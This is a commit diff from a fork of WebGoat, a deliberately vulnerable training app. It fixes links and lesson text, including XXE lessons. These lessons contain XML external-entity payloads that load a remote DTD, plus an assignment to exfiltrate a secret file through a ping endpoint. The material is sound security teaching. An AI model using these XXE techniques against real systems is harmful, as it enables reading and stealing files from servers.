dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fixing links in several lessons

Browse Source
This commit is contained in:
Nanne Baars 2017-03-23 09:37:53 +01:00
parent 634a4c75b6
commit 98000d6002
8 changed files with 19 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
README.MD
View File

@ -100,7 +100,7 @@ On x86 you can build a container with the following commands:
```Shell
cd WebGoat/
mvn package
cd webgoat-container
cd webgoat-server
mvn package
mvn docker:build
docker tag webgoat/webgoat-8.0 webgoat/webgoat-8.0:8.0

2
webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -1 +1 @@
jwt.title=JWT tokens
jwt.title=JWT tokens (Under development)

2
webgoat-lessons/sol.txt
View File

@ -41,7 +41,7 @@ Blind SendFile ...
* <pre>
* <?xml version="1.0"?>
* <!DOCTYPE root [
* <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd">
* <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
* %remote;
* ]>
* <user>

2
webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
View File

@ -114,7 +114,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
* <pre>
* <?xml version="1.0"?>
* <!DOCTYPE root [
* <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd">
* <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
* %remote;
* ]>
* <user>

2
webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -26,7 +26,7 @@ xxe.simple.output=Welcome {0} you can now login to our website
xxe.content.type.feedback.json=You are posting JSON which does not work with a XXE
xxe.content.type.feedback.xml=You are posting XML but there is no XXE attack performed
xxe.content.output=Welcome {0} you can now login to our website
xxe.blind.output=Contents of the file is:
xxe.blind.output=Contents of the file is: {0}
xxe.hints.simple.xxe.1=Try submitting the form and see what happens
xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack

6
webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
View File

@ -4,7 +4,7 @@ In some cases you will see no output because although your attack might have wor
Or the resource you are trying to read contains illegal XML character which causes the parser to fail.
Let's start with an example, in this case we reference a external DTD which we control on our own server.
Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server you control.*
Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server under your control.*
[source]
----
@ -33,7 +33,7 @@ Now submit the form and change the xml to:
----
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/attack.dtd">
<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/attack.dtd">
%remote;
]>
<user>
@ -51,5 +51,5 @@ GET Java/1.8.0_101 HelloWorld
So with the XXE we are able to ping our own server which means XXE injection is possible.
[NOTE]
In this case we use http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd to fetch the dtd but in reality this will
In this case we use http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd to fetch the dtd but in reality this will
of course be a host fully under the attackers control.

9
webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
View File

@ -1,7 +1,10 @@
== Blind XXE assignment
In the previous page we showed you how you can ping a server with a XXE attack, in this assigment try to make a DTD which will upload the
contents of ~/.webgoat/plugin/XXE/secret.txt to our server. For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows
this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server.
For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
If you use the Docker based WebGoat environment this file is located here: `/root/.webgoat/XXE/secret.txt`
Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]` (NOTE: this endpoint is under your full control)
You can login to the Docker container as follows: `docker exec -i -t <<name>> /bin/bash`

10
webgoat-server/pom.xml
View File

@ -86,11 +86,11 @@
<artifactId>webgoat-container</artifactId>
<version>${project.version}</version>
</dependency>
<dependency>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>challenge</artifactId>
<version>${project.version}</version>
</dependency>
<!--<dependency>-->
<!--<groupId>org.owasp.webgoat.lesson</groupId>-->
<!--<artifactId>challenge</artifactId>-->
<!--<version>${project.version}</version>-->
<!--</dependency>-->
<dependency>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>client-side-filtering</artifactId>